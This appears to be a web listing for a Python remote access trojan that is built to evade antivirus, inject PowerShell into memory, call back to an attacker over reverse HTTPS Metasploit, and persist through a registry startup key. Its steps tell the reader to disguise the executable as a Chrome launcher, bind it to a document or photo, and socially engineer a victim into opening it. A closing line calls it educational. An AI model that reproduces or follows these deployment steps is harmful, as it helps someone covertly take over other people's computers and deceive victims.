Python-Rootkit - Python Remote Administration Tool (RAT) To Gain Meterpreter Session

This is a full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine.

ViRu5 life cycle
  • Bypass all anti-virus.
  • Inject a malicious powershell script into memory.
  • Establish a reverse https connection to attacker machine.
  • Check every 10 seconds and make sure that the connection still exists, If not it will re-establish a new connection.
  • Add a startup register key to re-connect to the attacker after reboot.

  • Update viRu5/source.py parameters with your lhost and lport
  • Change source.py name to GoogleChromeAutoLaunch.py
  • Add GoogleChromeAutoLaunch.py, setup.py and your icon as icon.ico to c:\python27 dir
  • From cmd do

    cd c:\python27

    python setup.py py2exe

  • Find the RAT exe file in Dist dir.
  • Blind it with any photo, pdf, word or any kind of files
  • Send it to the victim
  • Use your social engineer skills to make him open the file
  • You will receive a reverse https metasoplit connection :)

Testing on
  • Windows 7 32bit
  • Windows 7 64bit
  • Windows 8 32bit
  • Windows 8 64bit
  • Windows 8.1 32bit
  • Windows 8.1 64 bit
  • Windows 10 32bit
  • Windows 10 64bit

This is for Educational purposes ONLY. First of all, this code aims to alarm people about security issues infected unpatched machines.

Disqus Comments